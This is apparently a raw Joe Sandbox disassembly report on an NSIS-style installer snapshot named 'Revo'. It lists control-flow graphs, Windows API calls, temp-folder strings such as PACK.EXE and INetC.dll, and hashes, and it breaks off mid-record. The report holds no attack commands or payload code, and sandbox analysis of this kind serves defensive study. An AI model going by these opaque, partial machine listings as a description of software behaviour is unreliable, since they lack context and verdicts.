                                                                                                                                                                            control_flow_graph 307 403d74-403d8c call 406a96 310 403da0-403dd7 call 406570 307->310 311 403d8e-403d9e call 4065e9 307->311 316 403dd9-403dea call 406570 310->316 317 403def-403df5 lstrcatW 310->317 320 403dfa-403e23 call 40404a call 406079 311->320 316->317 317->320 325 403eb5-403ebd call 406079 320->325 326 403e29-403e2e 320->326 332 403ecb-403ef0 LoadImageW 325->332 333 403ebf-403ec6 call 4066df 325->333 326->325 327 403e34-403e5c call 406570 326->327 327->325 334 403e5e-403e62 327->334 336 403f71-403f79 call 40140b 332->336 337 403ef2-403f22 RegisterClassW 332->337 333->332 338 403e74-403e80 lstrlenW 334->338 339 403e64-403e71 call 405f9e 334->339 348 403f83-403f8e call 40404a 336->348 349 403f7b-403f7e 336->349 340 404040 337->340 341 403f28-403f6c SystemParametersInfoW CreateWindowExW 337->341 345 403e82-403e90 lstrcmpiW 338->345 346 403ea8-403eb0 call 405f71 call 4066a2 338->346 339->338 344 404042-404049 340->344 341->336 345->346 352 403e92-403e9c GetFileAttributesW 345->352 346->325 360 403f94-403fae ShowWindow call 406a26 348->360 361 404017-404018 call 4057fa 348->361 349->344 355 403ea2-403ea3 call 405fbd 352->355 356 403e9e-403ea0 352->356 355->346 356->346 356->355 368 403fb0-403fb5 call 406a26 360->368 369 403fba-403fcc GetClassInfoW 360->369 364 40401d-40401f 361->364 366 404021-404027 364->366 367 404039-40403b call 40140b 364->367 366->349 370 40402d-404034 call 40140b 366->370 367->340 368->369 373 403fe4-404007 DialogBoxParamW call 40140b 369->373 374 403fce-403fde GetClassInfoW RegisterClassW 369->374 370->349 378 40400c-404015 call 403cc4 373->378 374->373 378->344
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                                              • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                                            • lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
                                                                                                                                                                            • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420), ref: 00403E75
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403E93
                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
                                                                                                                                                                              • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                                                            • RegisterClassW.USER32(00464200), ref: 00403F19
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                                                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
                                                                                                                                                                            • RegisterClassW.USER32(00464200), ref: 00403FDE
                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                            • API String ID: 1975747703-2601196950
                                                                                                                                                                            • Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                                                            • Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 484 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 487 403145-40314a 484->487 488 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 484->488 489 40338f-403393 487->489 496 403183 488->496 497 403268-403276 call 403053 488->497 498 403188-40319f 496->498 504 403347-40334c 497->504 505 40327c-40327f 497->505 500 4031a1 498->500 501 4031a3-4031ac call 403607 498->501 500->501 510 4031b2-4031b9 501->510 511 403303-40330b call 403053 501->511 504->489 506 403281-403299 call 40361d call 403607 505->506 507 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 505->507 506->504 530 40329f-4032a5 506->530 535 4032f9-4032fe 507->535 536 40330d-40333d call 40361d call 403396 507->536 514 403235-403239 510->514 515 4031bb-4031cf call 40614d 510->515 511->504 519 403243-403249 514->519 520 40323b-403242 call 403053 514->520 515->519 533 4031d1-4031d8 515->533 526 403258-403260 519->526 527 40324b-403255 call 406b83 519->527 520->519 526->498 534 403266 526->534 527->526 530->504 530->507 533->519 539 4031da-4031e1 533->539 534->497 535->489 544 403342-403345 536->544 539->519 541 4031e3-4031ea 539->541 541->519 543 4031ec-4031f3 541->543 543->519 545 4031f5-403215 543->545 544->504 546 40334e-40335f 544->546 545->504 547 40321b-40321f 545->547 548 403361 546->548 549 403367-40336c 546->549 550 403221-403225 547->550 551 403227-40322f 547->551 548->549 553 40336d-403373 549->553 550->534 550->551 551->519 552 403231-403233 551->552 552->519 553->553 554 403375-40338d call 40614d 553->554 554->489
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403109
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
                                                                                                                                                                              • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                              • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
                                                                                                                                                                            Strings
                                                                                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                                                                                                                                            • Null, xrefs: 004031EC
                                                                                                                                                                            • hA, xrefs: 004032B6
                                                                                                                                                                            • Inst, xrefs: 004031DA
                                                                                                                                                                            • Error launching installer, xrefs: 00403145
                                                                                                                                                                            • soft, xrefs: 004031E3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
                                                                                                                                                                            • API String ID: 2803837635-3376623841
                                                                                                                                                                            • Opcode ID: 7dbbcf09529f8eb162c35c87980925caa7ffea24ff0345c9a2ccdde980ec1a20
                                                                                                                                                                            • Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
                                                                                                                                                                            • Opcode Fuzzy Hash: 7dbbcf09529f8eb162c35c87980925caa7ffea24ff0345c9a2ccdde980ec1a20
                                                                                                                                                                            • Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 557 4066df-4066e8 558 4066ea-4066f9 557->558 559 4066fb-406715 557->559 558->559 560 406925-40692b 559->560 561 40671b-406727 559->561 562 406931-40693e 560->562 563 406739-406746 560->563 561->560 564 40672d-406734 561->564 565 406940-406945 call 4066a2 562->565 566 40694a-40694d 562->566 563->562 567 40674c-406755 563->567 564->560 565->566 569 406912 567->569 570 40675b-40679e 567->570 573 406920-406923 569->573 574 406914-40691e 569->574 571 4067a4-4067b0 570->571 572 4068b6-4068ba 570->572 575 4067b2 571->575 576 4067ba-4067bc 571->576 577 4068bc-4068c3 572->577 578 4068ee-4068f2 572->578 573->560 574->560 575->576 581 4067f6-4067f9 576->581 582 4067be-4067dc call 406570 576->582 579 4068d3-4068df call 4066a2 577->579 580 4068c5-4068d1 call 4065e9 577->580 583 406902-406910 lstrlenW 578->583 584 4068f4-4068fd call 4066df 578->584 593 4068e4-4068ea 579->593 580->593 588 4067fb-406807 GetSystemDirectoryW 581->588 589 40680c-40680f 581->589 592 4067e1-4067e4 582->592 583->560 584->583 594 406899-40689c 588->594 595 406821-406825 589->595 596 406811-40681d GetWindowsDirectoryW 589->596 597 4067ea-4067f1 call 4066df 592->597 598 40689e-4068a1 592->598 593->583 599 4068ec 593->599 594->598 600 4068ae-4068b4 call 406950 594->600 595->594 601 406827-406845 595->601 596->595 597->594 598->600 603 4068a3-4068a9 lstrcatW 598->603 599->600 600->583 605 406847-40684d 601->605 606 406859-406871 call 406a96 601->606 603->600 610 406855-406857 605->610 614 406873-406886 SHGetPathFromIDListW CoTaskMemFree 606->614 615 406888-406891 606->615 610->606 612 406893-406897 610->612 612->594 614->612 614->615 615->601 615->612
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 00406801
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Remove folder: ), ref: 00406875
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                                                                                                                                            • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                                                                                                                                            • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                            • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                            • API String ID: 4024019347-627599061
                                                                                                                                                                            • Opcode ID: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                                                            • Instruction ID: 81e951f8fe173c1ecdb7e664093ca8164433b695446651b9203bd6f4f8051ee3
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B6145B2A053019BEB20AF65DC8472B77D4AF45314F25453FF583B22D0EA7C8960876E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 680 405727-40573c 681 405742-405753 680->681 682 4057f3-4057f7 680->682 683 405755-405759 call 4066df 681->683 684 40575e-40576a lstrlenW 681->684 683->684 685 405787-40578b 684->685 686 40576c-40577c lstrlenW 684->686 689 40579a-40579e 685->689 690 40578d-405794 SetWindowTextW 685->690 686->682 688 40577e-405782 lstrcatW 686->688 688->685 691 4057a0-4057e2 SendMessageW * 3 689->691 692 4057e4-4057e6 689->692 690->689 691->692 692->682 693 4057e8-4057eb 692->693 693->682
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                            • lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                            • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                            • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                            • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\
                                                                                                                                                                            • API String ID: 2531174081-3830878547
                                                                                                                                                                            • Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                                                            • Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                                                            • Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 694 401794-4017b9 call 402dcb call 405fe8 699 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 694->699 700 4017bb-4017c1 call 4066a2 694->700 705 4017da-4017db call 406950 699->705 700->705 709 4017e0-4017e4 705->709 710 4017e6-4017f0 call 4069ff 709->710 711 401817-40181a 709->711 718 401802-401814 710->718 719 4017f2-401800 CompareFileTime 710->719 713 401822-40183e call 406192 711->713 714 40181c-40181d call 40616d 711->714 721 401840-401843 713->721 722 4018b2-4018db call 405727 call 403396 713->722 714->713 718->711 719->718 724 401894-40189e call 405727 721->724 725 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 721->725 735 4018e3-4018ef SetFileTime 722->735 736 4018dd-4018e1 722->736 737 4018a7-4018ad 724->737 725->709 757 401889-40188a 725->757 740 4018f5-401900 CloseHandle 735->740 736->735 736->740 738 402c58 737->738 741 402c5a-402c5e 738->741 743 401906-401909 740->743 744 402c4f-402c52 740->744 746 40190b-40191c call 4066df lstrcatW 743->746 747 40191e-401921 call 4066df 743->747 744->738 753 401926-4023c7 call 405d02 746->753 747->753 753->741 760 402953-40295a 753->760 757->737 759 40188c-40188d 757->759 759->724 760->744
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017D5
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\PACK.EXE,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017FA
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE$C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dll
                                                                                                                                                                            • API String ID: 1941528284-364468337
                                                                                                                                                                            • Opcode ID: e754ad755ac4ebc946d1f76660a4366266a33e6d35abd67097047bb5803dd91e
                                                                                                                                                                            • Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
                                                                                                                                                                            • Opcode Fuzzy Hash: e754ad755ac4ebc946d1f76660a4366266a33e6d35abd67097047bb5803dd91e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 761 402711-40272a call 402da9 764 402730-402737 761->764 765 402c4f-402c52 761->765 766 402739 764->766 767 40273c-40273f 764->767 768 402c58-402c5e 765->768 766->767 770 4028a3-4028ab 767->770 771 402745-402754 call 406602 767->771 770->765 771->770 774 40275a 771->774 775 402760-402764 774->775 776 4027f9-4027fc 775->776 777 40276a-402785 ReadFile 775->777 779 402814-402824 call 406215 776->779 780 4027fe-402801 776->780 777->770 778 40278b-402790 777->778 778->770 781 402796-4027a4 778->781 779->770 788 402826 779->788 780->779 782 402803-40280e call 406273 780->782 784 4027aa-4027bc MultiByteToWideChar 781->784 785 40285f-40286b call 4065e9 781->785 782->770 782->779 784->788 789 4027be-4027c1 784->789 785->768 792 402829-40282c 788->792 793 4027c3-4027ce 789->793 792->785 795 40282e-402833 792->795 793->792 796 4027d0-4027f5 SetFilePointer MultiByteToWideChar 793->796 797 402870-402874 795->797 798 402835-40283a 795->798 796->793 799 4027f7 796->799 801 402891-40289d SetFilePointer 797->801 802 402876-40287a 797->802 798->797 800 40283c-40284f 798->800 799->788 800->770 803 402851-402857 800->803 801->770 804 402882-40288f 802->804 805 40287c-402880 802->805 803->775 806 40285d 803->806 804->770 805->801 805->804 806->770
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                                              • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                            • String ID: 9
                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                            • Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                                                            • Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
